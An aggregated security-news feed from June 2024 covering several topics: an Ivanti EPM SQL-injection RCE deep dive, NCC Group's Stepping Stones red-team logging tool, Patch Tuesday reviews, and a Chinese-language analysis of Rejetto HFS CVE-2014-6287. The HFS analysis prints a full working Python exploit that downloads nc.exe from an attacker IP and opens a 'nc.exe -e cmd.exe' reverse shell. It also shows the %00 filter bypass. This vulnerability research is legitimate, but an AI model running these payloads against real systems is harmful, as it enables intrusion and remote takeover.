Normal view

There are new articles available, click to refresh the page.
Today — 12 June 2024Main stream

CVE-2024-29824 Deep Dive: Ivanti EPM SQL Injection Remote Code Execution Vulnerability

12 June 2024 at 14:27

Introduction

Ivanti Endpoint Manager (EPM) is an enterprise endpoint management solution that allows for centralized management of devices within an organization. On May 24, 2024, ZDI and Ivanti released an advisory describing a SQL injection resulting in remote code execution with a CVSS score of 9.8. In this post we will detail the internal workings of this vulnerability. Our POC can be found here.

RecordGoodApp

Luckily for us, the ZDI advisory told us exactly where to look for the SQL injection. A function named RecordGoodApp. After installation, we find most of the application binaries in C:\Program Files\LANDesk. Searching for RecordGoodApp we find its present in a file named PatchBiz.dll.

RecordGoodApp Search

RecordGoodApp Search

We can use JetBrains dotPeek tool to disassemble the PatchBiz.dll C# binary. From there we can search for the RecordGoodApp method.

RecordGoodApp Disassembly

RecordGoodApp Disassembly

We can readily see that the first SQL statement in the function is potentially vulnerable to an SQL injection. They use string.Format to insert the value of goodApp.md5 into the SQL query. Assuming we can find a way to influence the value of goodApp.md5 we should be able to trigger the SQL injection.

Finding a Path to the Vulnerable Function

Next, we would like to see if there are any obvious paths to the RecordGoodApp function that we can use to trigger the vulnerability. Luckily we can use dotPeek again to search for any references to RecordGoodApp. However, to make sure we don’t miss anything, we first want to make sure that we have all potential application binaries loaded into dotPeek. If we don’t, we run the risk of missing a reference to the vulnerable function. We find that RecordGoodApp is first called from AppMonitorAction.RecordPatchIssue.

AppMonitorAction.RecordPatchIssue

AppMonitorAction.RecordPatchIssue

Continuing, we find the AppMonitorAction.RecordPatchIsssue is called by Patch.UpdateActionHistory

Patch.UpdateActionHistory

Patch.UpdateActionHistory

We find that UpdateActionHistory is called from three different locations.

Patch.UpdateActionHistory Usage

Patch.UpdateActionHistory Usage

This most interesting of these usages is StatusEvents.EventHandler.UpdateStatusEvents. We find that it is annotated with [WebMethod] in the EventHandler class. EventHandler inherits from System.Web.Services.WebService. This strongly indicates that we should be able to hit UpdateStatusEvents over HTTP.

UpdateStatusEvents

UpdateStatusEvents

Triggering the Vulnerable Function

Now that we have found a viable path to the vulnerable function, our attention turns to triggering the vulnerable function. First, using IIS Manager, we notice that EventHandler.cs is hosted on the /WSStatusEvents endpoint.

IIS Manager WSStatusEvents

IIS Manager WSStatusEvents

Navigating to the endpoint in a browser, we are led to a page that shows up some example requests and responses.

UpdateStatusEvents Examples

UpdateStatusEvents Examples

Now, we can copy these example requests into Burp Suite and begin modifying them to see if we can trigger the exploit. Using dyspy, we attach to the IIS process hosting the vulnerable endpoint and start sending requests. After a little bit more reversing, we come up with a fairly trivial request using xp_cmdshell to gain RCE.

Successfully exploiting using Burp

Successfully exploiting using Burp

Finally, we see notepad.exe running under sqlservr.exe proving that our exploit worked!

notepad running under sqlservr.exe

notepad running under sqlservr.exe

Indicators of Compromise

The MS SQL logs can be examined for evidence of xp_cmdshell being utilized to obtain command execution. Note that this is likely not the only method for gaining RCE, but it is a popular one.

SQL Server logs showing evidence of xp_cmdshell usage.

SQL Server logs showing evidence of xp_cmdshell usage.

NodeZero

NodeZero Attack Path utilizing CVE-2024-29824 to load a remote access tool and access files 

Horizon3.ai clients and free-trial users alike can run a NodeZero operation to determine the exposure and exploitability of this issue.

Sign up for a free trial and quickly verify you’re not exploitable.

Start Your Free Trial

 

The post CVE-2024-29824 Deep Dive: Ivanti EPM SQL Injection Remote Code Execution Vulnerability appeared first on Horizon3.ai.

Stepping Stones – A Red Team Activity Hub

12 June 2024 at 13:31

Executive Summary

NCC Group is pleased to open source a new tool built to help Red Teams log their activity for later correlation with the Blue Team’s own logging. What started as a simple internal web based data-collection tool has grown to integrate with Cobalt Strike and BloodHound to improve the accuracy and ease of activity recording. As the tool became integral to how NCC Group’s Full Spectrum Attack Simulation (FSAS) team delivered Red and Purple Team assessments additional functionality such as reporting plugins and credential analysis have grown the tool into something we believe could benefit the wider Red Teaming community.

Access the code at: https://github.com/nccgroup/SteppingStones

Features

Activity Recording

At the heart of Stepping Stones are “Events” which describe a specific Red Team action between a source and a target. They can be annotated with MITRE ATT CK IDs, tags or the raw command line evidence, but the original design philosophy was to make data capture as effortless as possible so none of these are mandatory in order to allow data to be entered “in the heat of battle” rather than retrospectively.

Additionally, files can be dropped onto an Event to record where artifacts have been placed (allowing more effective post-job clean-up) and to generate file hashes for Blue Team reporting.

Cobalt Strike Integration

Stepping Stones includes a bot which can connect to your Cobalt Strike team server and stream activity into Stepping Stones. This is held in a separate area of the application so that the only relevant activity can be “cherry picked” and escalated into a reportable Event. This “cherry-picking” workflow also applies to other types of ingested activity like PowerShell transcripts imported via the bespoke EventStream format.

Alternatively, as beacons are spawned the source/target dropdowns for Events are updated with any new hosts, users and processes so that Events can also be manually recorded against the compromised systems.

Having access to real-time Cobalt Strike activity facilitates other functionality such as being able to notify (via webhooks) when a beacon first connects, or mark one as “watched” so that a Red Team operator can be re-notified should a dormant beacon reconnect, e.g. when a victim powers on their laptop the next day. Beacons and their associated activity can alternatively be excluded from the UI, reports and notifications if they match configurable patterns that identify them as the result of internal testing rather than genuine victim activity.

BloodHound Integration

To further improve the accuracy of sources and targets Stepping Stones can connect to BloodHound’s Neo4j database and use the data within to suggest users and hosts.

Again, with this integration in place a number of other features were subsequently added to make the life of the Red Team operator easier: there is a tree view of the domain(s) OU structure in Stepping Stones based on the BloodHound data – allowing a more familiar hierarchical target selection view of the graph data. Similarly, Stepping Stones facilitates building wordlists from text in BloodHound to help crack those accounts whose password is derived from the account name or a comment on the user in AD.

Credentials

A successful Red Team operation will come across a number of passwords, secrets and hashes on their way to meeting their objectives. Managing these can be cumbersome and the Credentials area of Stepping Stones aims to alleviate that. Hashes and passwords can be extracted from raw tool output or the streamed Cobalt Strike activity, and any associated compromised accounts marked as “owned” within BloodHound automatically.

Features from https://github.com/crypt0rr/pack/ have been re-implemented to generate likely wordlists and hashcat masks from previously cracked data.

A graphical dashboard provides further insight into the patterns used for passwords, generating graphs for statistics like those produced by https://github.com/digininja/pipal and comparisons against the https://haveibeenpwned.com/ breached passwords.

Architecture

Stepping Stones has been “dog fooded” by the FSAS team throughout its multi-year development and has been able to happily scale up to multi-month jobs. However, the system aims to still be useful even if not integrated with Cobalt Strike/BloodHound.

It is a Python Django web application which can run on either Windows or Linux. The philosophy is to deploy a fresh instance for each engagement, as it supports multiple users, but not multiple engagements. The database is currently SQLite, allowing all data for that engagement to be archived without cross contamination between jobs or a build up of multiple jobs worth of sensitive data.

Full installation and upgrade steps can be found in the read me file.

Horizon3.ai Appoints Jill Passalacqua as Chief Legal Officer

12 June 2024 at 13:05

Business Wire 06/12/2024

Horizon3.ai, a leading provider of autonomous security solutions, today announced the appointment of Jill Passalacqua as Chief Legal Officer (CLO), effective immediately. As Chief Legal Officer, Jill leads Horizon3.ai’s legal department, bringing extensive experience in advising prominent public and private technology companies…

Read the entire article here

The post Horizon3.ai Appoints Jill Passalacqua as Chief Legal Officer appeared first on Horizon3.ai.

[CVE-2014-6287]Rejetto HTTP File Server远程命令执行漏洞分析

12 June 2024 at 09:00

作者:k0shl 转载请注明出处:https://whereisk0shl.top


漏洞说明


软件下载:
https://sourceforge.net/projects/hfs/files/HFS/2.3b/ (感谢@1195011908更正目标软件下载地址)

PoC:

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#          It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#          It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 
  
#Usage : python Exploit.py <Target IP address> <Target Port Number>
 
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!
 
 
import urllib2
import sys
 
try:
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
 
    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
 
    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
 
    ip_addr = "192.168.44.128" #local IP address
    local_port = "443" # Local Port number
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""

直接运行,输入想执行的命令即可


此漏洞是一个命令注入漏洞,原因是hfs.exe中,对于检测规则控制不严格,导致可以利用%00截断符绕过检测机制,从而执行后面的命令,达到任意命令执行的目的,下面对此漏洞进行详细分析。


漏洞分析


这里使用?search = %00{.exec|calc.}作为测试代码,首先hfs.exe会在00403282地址处,接收到search请求的字符串。

0:000> g
Breakpoint 3 hit
eax=0012e5b0 ebx=0012f620 ecx=0000000d edx=010c78e8 esi=0012e5b0 edi=010c78e8
eip=00403282 esp=0012e598 ebp=00000016 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
hfs_exe_unpacked_+0x3282:
00403282 df3c11          fistp   qword ptr [ecx+edx] ds:0023:010c78f5=0000000000637c63
0:000> dc 010c78ef
010c78ef  652e7b00 7c636578 00000063 00000000  .{.exec|c.......
010c78ff  00000000 0c7ef900 431e6401 00000000  ......~..d.C....
010c790f  4355fc00 cebf0000 d066d800 cebf3800  ..UC......f..8..
010c791f  00000800 000060ff 00000000 0c7f4900  .....`.......I..
010c792f  00000001 00000000 53464800 4449535f  .........HFS_SID
010c793f  332e303d 37323730 31303031 30323631  =0.3072710011620
010c794f  00003730 0c815100 00000001 00001a00  07...Q..........
010c795f  72623c00 d6bbb23e bbd6b3a7 d3acbaf2  .<br>...........
0:000> dc edx
010c78e8  72616573 003d6863 78652e7b 637c6365  search=.{.exec|c

在010c78e8位置是在接收字符串,实际上,这个地址外层函数实现的功能是对接收到的GET参数进行判断,从而执行不同的代码逻辑,这里胡接收到?search的内容。

接下来,程序会进入一处正则表达式匹配,在这里,会对接收到的参数内容进行过滤。

.text:00509828                 push    ebx
.text:00509829                 push    0
.text:0050982B                 mov     ecx, offset dword_50986C
.text:00509830                 mov     edx, offset a__ ; "\\{[.:]|[.:]\\}|\\|"
.text:00509835                 mov     eax, [ebp+var_4]
.text:00509838                 call    sub_50A848

在这个过程中,会逐一遍历search后面的参数,也是漏洞触发的关键原因。地址00509830位置会将正则字符串推入栈中进行匹配。匹配后会进行转码,从而避免执行命令。

比如,当我们输入一个正常search参数的时候。

0:000> g
Breakpoint 1 hit
eax=00d135c8 ebx=00579ecc ecx=0000002f edx=00000003 esi=00000003 edi=00000030
eip=00509147 esp=0012f04c ebp=0012f088 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
hfs_exe_unpacked_+0x109147:
00509147 e84c7d0000      call    hfs_exe_unpacked_+0x110e98 (00510e98)
0:000> dc eax
00d135c8  65722e7b 63616c70 7c227c65 6f757126  {.replace|"|&quo
00d135d8  207c3b74 32312326 652e3b33 26636578  t;| {.exec&
00d135e8  34323123 6c61633b 34232663 2e7d3b36  #124;calc.}.

可以看到对应部分已经被转码,但是这里却没有对%00作为判断,默认遇到%00就截断了,因此可以利用这个方法绕过检测。

0:000> bp 00509147 ".if(@eax == 0x00d22728){;}.else{g;}"

0:000> g
(344.348): Unknown exception - code 0eedfade (first chance)
(344.348): Unknown exception - code 0eedfade (first chance)
eax=00d22728 ebx=00579ecc ecx=0000000c edx=00000004 esi=00000003 edi=0000000d
eip=00509147 esp=0012f04c ebp=0012f088 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
hfs_exe_unpacked_+0x109147:
00509147 e84c7d0000      call    hfs_exe_unpacked_+0x110e98 (00510e98)
0:000> dc eax
00d22728  652e7b00 7c636578 636c6163 00007d2e  .{.exec|calc.}..

这里可以看到处理后的字符串没有转码,直接输出了,这就造成了漏洞的发生,接下来。

int __stdcall sub_5096E0(signed int a1, int a2)
{
  int result; // eax@2
  int savedregs; // [sp+Ch] [bp+0h]@2

  if ( a1 <= 50 )
  {
    sub_508ECC(&savedregs);
    result = sub_509418((int)&savedregs);
  }
  return result;
}

程序胡自进入sub_5096E0中对字符串进行处理,这里所谓的处理过程,就是对于exec和calc的分开,主要就是为了后续匹配exec,然后执行calc。首先

0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00000003 esi=0000000c edi=0000000d
eip=00405987 esp=0012f020 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x5987:
00405987 7f11            jg      hfs_exe_unpacked_+0x599a (0040599a)     [br=0]
0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00000003 esi=0000000c edi=0000000d
eip=00405989 esp=0012f020 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x5989:
00405989 01c2            add     edx,eax
0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00d2272b esi=0000000c edi=0000000d
eip=0040598b esp=0012f020 ebp=0012f044 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
hfs_exe_unpacked_+0x598b:
0040598b 8b442408        mov     eax,dword ptr [esp+8] ss:0023:0012f028=0012f080
0:000> dc edx
00d2272b  63657865 6c61637c 007d2e63 007c5c00  exec|calc.}..\|.
00d2273b  d2310100 00000000 00000c00 53464800  ..1..........HFS
00d2274b  cfc5d03d d0d0d6a2 d00000c4 0000edb1  =...............
00d2275b  d1c00000 00000100 00001000 74706f00  .............opt
00d2276b  2e6e6f69 6d6d6f63 3d746e65 31000031  ion.comment=1..1
00d2277b  d1c00000 00000100 00000e00 4c505500  .............UPL
00d2278b  2044414f 55534552 0053544c 00000000  OAD RESULTS.....
00d2279b  d1c00000 00000100 00000e00 524c4100  .............ALR

这里会处理字符串{.部分,获得一个新的字符串,然后继续跟踪。

0:000> g
Breakpoint 8 hit
eax=010c3150 ebx=0012ed54 ecx=636c6163 edx=010c2af0 esi=010c3150 edi=010c2af0
eip=00403324 esp=0012ed00 ebp=0012ed34 iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000297
hfs_exe_unpacked_+0x3324:
00403324 c3              ret
0:000> dc eax
010c3150  636c6163 6c610000 00650063 010c2960  calc..alc.e.`)..
010c3160  00000001 0000000b 72616553 cb3d6863  ........Search=.
010c3170  00f7cbd1 010c2960 00000001 0000000b  ....`)..........
010c3180  646c6f46 c43d7265 00bcc2bf 010c2960  Folder=.....`)..
010c3190  00000001 00000009 6b636142 bbb5b73d  ........Back=...
010c31a0  312d00d8 010c2960 00000001 0000000b  ..-1`)..........
010c31b0  b73d7055 c9d8bbb5 00e3b2cf 010c2960  Up=.........`)..
010c31c0  00000001 00000009 656d6f48 d2d7ca3d  ........Home=...
0:000> dc 010c2b68
010c2b68  63657865 78650000 00006365 010c2960  exec..exec..`)..
010c2b78  00cc49a0 00000007 70747468 002f2f3a  .I......http://.
010c2b88  00650031 010c2960 00000001 00000009  1.e.`)..........
010c2b98  454d4954 46454c20 00000054 010c2a71  TIME LEFT...q*..
010c2ba8  00000000 00000007 45464552 00524552  ........REFERER.
010c2bb8  00454d49 010c2960 00000001 00000008  IME.`)..........

通过下内存写入断点,可以看到处理后会将exec和calc分开。接下来程序会进入一处sub_52CE88函数,这个函数会对calc字符串进行拷贝。

int __usercall sub_52CE88@<eax>(int a1@<eax>, int a2@<edx>, int a3@<ebx>)
{
  int v3; // esi@1
  int v4; // ecx@1
  int v5; // ecx@1
  int v6; // ecx@1
  int v7; // ebx@3
  int *v8; // ecx@5
  unsigned int v10; // [sp-Ch] [bp-1Ch]@1
  void *v11; // [sp-8h] [bp-18h]@1
  int *v12; // [sp-4h] [bp-14h]@1
  int v13; // [sp+8h] [bp-8h]@1
  int v14; // [sp+Ch] [bp-4h]@1
  int savedregs; // [sp+10h] [bp+0h]@1

  v13 = 0;
  v3 = a2;
  v14 = a1;
  __linkproc__ LStrAddRef();
  v12 = &savedregs;
  v11 = &loc_52CF19;
  v10 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v10);
  __linkproc__ LStrAsg(v4, v14);

这步完成之后继续单步跟踪。

.text:00537063 loc_537063:                             ; CODE XREF: sub_535540+1B16j
.text:00537063                 mov     eax, [ebp+var_4]
.text:00537066                 mov     edx, offset aExec ; "exec"
.text:0053706B                 call    @@LStrCmp       ; __linkproc__ LStrCmp
.text:00537070                 jnz     short loc_537079
.text:00537072                 push    ebp
.text:00537073                 call    sub_5328E8

程序会在这里和exec做一次匹配,如果匹配成功,则会执行接下来的call sub_5328E8操作。

Breakpoint 3 hit
eax=010c3f78 ebx=00d07ad0 ecx=63657865 edx=00538970 esi=00000003 edi=00000006
eip=0053706b esp=0012edb4 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x13706b:
0053706b e8e8e7ecff      call    hfs_exe_unpacked_+0x5858 (00405858)
0:000> dc eax
010c3f78  63657865 253d0000 00263030 010c2960  exec..=%00&.`)..
010c3f88  00000002 00000009 63657865 6c61637c  ........exec|cal
010c3f98  00260063 010c2960 00000001 00000007  c.&.`)..........
010c3fa8  6165733f 00686372 00000000 0d3d7364  ?search.....ds=.
010c3fb8  616e650a 2d656c62 7263616d 793d736f  .enable-macros=y
010c3fc8  0a0d7365 2d657375 74737973 692d6d65  es..use-system-i
010c3fd8  736e6f63 7365793d 696d0a0d 696d696e  cons=yes..minimi
010c3fe8  742d657a 72742d6f 793d7961 0a0d7365  ze-to-tray=yes..
0:000> dc edx
00538970  63657865 00000000 ffffffff 00000014  exec............
00538980  a8b6e8c9 d8b55049 c4b5b7d6 c8b6d9cb  ....IP..........
00538990  c6d6decf 00000000 00000000 447a0000  ..............zD

可以看到,这里匹配的两个字符串指针eax和edx都是exec,也就是执行字符串匹配成功,接下来会进入sub_5328E8。

.text:00532AD9 loc_532AD9:                             ; CODE XREF: sub_5328E8+D7j
.text:00532AD9                 mov     eax, [ebp+arg_0]
.text:00532ADC                 push    eax
.text:00532ADD                 lea     edx, [ebp+var_2C]
.text:00532AE0                 mov     eax, [ebp+arg_0]
.text:00532AE3                 mov     eax, [eax-10h]
.text:00532AE6                 call    sub_52CE88
.text:00532AEB                 mov     eax, [ebp+var_2C]
.text:00532AEE                 mov     ecx, 5
.text:00532AF3                 mov     edx, [ebp+var_4]
.text:00532AF6                 call    sub_50CEC4

到达00532AF6地址位置,调用了sub_50CEC4函数,这个函数就是执行函数,来看一下伪代码。

char *__usercall sub_50CEC4@<eax>(_BYTE *a1@<eax>, int a2@<edx>, signed __int32 a3@<ecx>)
{
  nShowCmd = _InterlockedExchange((volatile signed __int32 *)&v46, a3);

      if ( v46
        && (v20 = nShowCmd,
            v21 = (const CHAR *)__linkproc__ LStrToPChar(),
            v22 = (const CHAR *)__linkproc__ LStrToPChar(),
            (unsigned int)ShellExecuteA(0, "open", v22, v21, 0, v20) > 0x20) )
      {

伪代码内部调用了ShellExecuteA函数,执行了任意命令。

总结一下整个过程,程序在对接收到的search函数进行处理的过程中,会进行一次正则表达式匹配转码,而这个过程没有对%00字符串进行处理,从而误认为遇到%00就结束了,从而利用这种方法绕过正则匹配,这样在后续分解过程中,可以用exec匹配到执行命令,执行任意命令。
```

Yesterday — 11 June 2024Main stream

Only one critical issue disclosed as part of Microsoft Patch Tuesday

11 June 2024 at 17:46
Only one critical issue disclosed as part of Microsoft Patch Tuesday

Microsoft released its monthly security update Tuesday, disclosing 49 vulnerabilities across its suite of products and software.  

Of those there is only one critical vulnerability. Every other security issues disclosed this month is considered "important."

The lone critical security issue is CVE-2024-30080, a remote code execution vulnerability due to a use-after-free (UAF) issue in the HTTP handling function of Microsoft Message Queuing (MSMQ) messages.  

An adversary can send a specially crafted malicious MSMQ packet to an MSMQ server, potentially allowing them to perform remote code execution on the server side. Microsoft considers this vulnerability “more likely” to be exploited. 

There is also a remote code execution vulnerability in Microsoft Outlook, CVE-2024-30103. By successfully exploiting this vulnerability, an adversary can bypass Outlook registry block lists and enable the creation of malicious DLL (Dynamic Link Library) files. However, the adversary must be authenticated using valid Microsoft Exchange user credentials. Microsoft has also mentioned that the Outlook application Preview Pane is an attack vector. 

The company also disclosed a high-severity elevation of privilege vulnerability in Azure Monitor agent (CVE-2024-35254). An unauthenticated adversary with read access permissions can exploit this vulnerability by performing arbitrary file and folder deletion on a host where the Azure Monitor Agent is installed. However, this vulnerability does not disclose confidential information, but it could allow the adversary to delete data that could result in a denial of service. 

CVE-2024-30077, a high-severity remote code execution vulnerability in Microsoft OLE (Object Linking and Embedding), could also be triggered if an adversary tricks an authenticated user into attempting to connect to a malicious SQL server database via a connection driver (OLE DB or OLEDB). This could result in the database returning malicious data that could cause arbitrary code execution on the client.  

The Windows Wi-Fi driver also contains a high-severity remote code execution vulnerability, CVE-2024-30078. An adversary can exploit this vulnerability by sending a malicious networking packet to an adjacent system employing a Wi-Fi networking adapter, which could enable remote code execution. However, to exploit this vulnerability, an adversary must be near the target system to send and receive radio transmissions.  

CVE-2024-30063 and CVE-2024-30064 are high-severity elevation of privilege vulnerabilities in the Windows Distributed File System (DFS). An adversary who successfully exploits these vulnerabilities could gain elevated privileges through a vulnerable DFS client, allowing the adversary to locally execute arbitrary code in the kernel. However, an adversary must be locally authenticated to exploit these vulnerabilities by running a specially crafted application.  

Talos would also like to highlight a few more high-severity elevation of privilege vulnerabilities that Microsoft considers are “more likely” to be exploited. 

CVE-2024-30068, an elevation of privilege vulnerabilities in the Windows kernel, exists that could allow an adversary to gain SYSTEM-level privileges. By exploiting this vulnerability from a low-privilege AppContainer, an adversary can elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment. However, the adversary should first login to the system and then run a specially crafted application that could exploit the vulnerability and take control of an affected system.  

There are three high-severity elevation of privilege vulnerabilities — CVE-2024-30082, CVE-2024-30087 and CVE-2024-30091 — in Win32K kernel drivers that exist because of an out-of-bounds (OOB) issue. An adversary who exploits CVE-2024-30082 could gain SYSTEM privileges and exploiting CVE-2024-30087 and CVE-2024-30091, would gain the rights of the user that is running the affected application. Microsoft considers these vulnerabilities “more likely” to be exploited. 

CVE-2024-30088 and CVE-2024-30099 are two high-severity, and more “likely exploitable” elevation of privilege vulnerabilities in NT kernel drivers. Successful exploitation of these vulnerabilities would provide the local user and SYSTEM privileges to an adversary, respectively.  

Mskssrv, a Microsoft Streaming Service kernel driver, also contains two elevation of privilege vulnerabilities: CVE-2024-30089 and CVE-2024-30090. An adversary successfully exploiting these vulnerabilities could gain SYSTEM privileges.   

CVE-2024-30084 and CVE-2024-35250 are two more likely exploitable, high-severity elevation of privilege vulnerabilities in the Windows Kernel-Mode driver. An adversary could gain SYSTEM privileges by successfully exploiting these vulnerabilities. However, they must first win a race condition. 

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.  

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their rule set by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63581 - 63591, 63596 and 63597. There are also Snort 3 pre-processor rules 300937 - 300940.

The June 2024 Security Update Review

11 June 2024 at 17:31

Somehow, we’ve made it to the sixth patch Tuesday of 2024, and Microsoft and Adobe have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:

Adobe Patches for June 2024

For June, Adobe released 10 patches addressing 165(!) CVEs in Adobe Cold Fusion, Photoshop,  Experience Manager, Audition, Media Encoder, FrameMaker Publishing Server, Adobe Commerce, Substance 3D Stager, Creative Cloud Desktop, and Acrobat Android. The fix for Experience Manager is by far the largest with a whopping 143 CVEs addressed. However, all but one of these bugs are simply cross-site scripting (XSS) vulnerabilities. The patch for Cold Fusion fixes two bugs, but neither are code execution bugs. That’s the same case for the patch addressing bugs in Audition. The fix for Media Encoder has a single OOB Read memory leak fixed. The update for Photoshop also has just one bug – a Critical-rated code execution issue. That’s also the story for the Substance 3D Stager patch.

The patch for FrameMaker Publishing Server has only two bugs, but one is a CVSS 10 and the other is a 9.8. If you’re using this product, this should be the first patch you test and deploy. The patch for Commerce should also be high on your test-and-deploy list as it corrects 10 bugs, including some Critical-rated code execution vulns. The patch for Creative Cloud Desktop fixes a single code execution bug. Finally, the patch for Acrobat Android corrects two security feature bypasses.

None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.

Microsoft Patches for June 2024

This month, Microsoft released 49 CVEs in Windows and Windows Components; Office and Office Components; Azure; Dynamics Business Central; and Visual Studio. If you include the third-party CVEs being documented this month, the CVE count comes to 58. A total of eight of these bugs came through the ZDI program, and that does include some of the cases reported during the Pwn2Own Vancouver contest in March.

Of the new patches released today, only one is rated Critical, and 48 are rated Important in severity. This release is another small release when compared to the monster that was April.

Only one of the CVEs listed today is listed as publicly known, but that’s actually just a third-party update that’s now being integrated into Microsoft products. Nothing is listed as being under active attack. Let’s take a closer look at some of the more interesting updates for this month, starting with the lone Critical-rated patch for this month:

-       CVE-2024-30080 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
This update receives a CVSS rating of 9.8 and would allow remote, unauthenticated attackers to execute arbitrary code with elevated privileges of systems where MSMQ is enabled. That makes this wormable between those servers, but not to systems where MSMQ is disabled. This is similar to the “QueueJumper” vulnerability from last year, but it’s not clear how many affected systems are exposed to the internet. While it is likely a low number, now would be a good time to audit your networks to ensure TCP port 1801 is not reachable.  

-       CVE-2024-30103 – Microsoft Outlook Remote Code Execution Vulnerability
This patch corrects a bug that allows attackers to bypass Outlook registry block lists and enable the creation of malicious DLL files. While not explicitly stated, attackers would likely then use the malicious DLL files to perform some form of DLL hijacking for further compromise. The good news here is that the attacker would need valid Exchange credentials to perform this attack. The bad news is that the exploit can occur in the Preview Pane. Considering how often credentials end up being sold in underground forums, I would not ignore this fix.  

-       CVE-2024-30078 – Windows Wi-Fi Driver Remote Code Execution Vulnerability
This vulnerability allows an unauthenticated attacker to execute code on an affected system by sending the target a specially crafted network packet. Obviously, the target would need to be in Wi-Fi range of the attacker and using a Wi-Fi adapter, but that’s the only restriction. Microsoft rates this as “exploitation less likely” but considering it hits every supported version of Windows, it will likely draw a lot of attention from attackers and red teams alike.

Here’s the full list of CVEs released by Microsoft for June 2024:

CVE Title Severity CVSS Public Exploited Type
CVE-2024-30080 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability Critical 9.8 No No RCE
CVE-2024-35255 Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-35254 † Azure Monitor Agent Elevation of Privilege Vulnerability Important 7.1 No No EoP
CVE-2024-37325 † Azure Science Virtual Machine (DSVM) Elevation of Privilege Vulnerability Important 9.8 No No EoP
CVE-2024-35252 Azure Storage Movement Client Library Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-30070 DHCP Server Service Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-29187 * GitHub: CVE-2024-29187 WiX Burn-based bundles are vulnerable to binary hijack when run as SYSTEM Important 7.3 No No EoP
CVE-2024-35253 Microsoft Azure File Sync Elevation of Privilege Vulnerability Important 4.4 No No EoP
CVE-2024-35263 Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability Important 5.7 No No Info
CVE-2024-35248 Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability Important 7.3 No No EoP
CVE-2024-35249 Microsoft Dynamics 365 Business Central Remote Code Execution Vulnerability Important 8.8 No No RCE
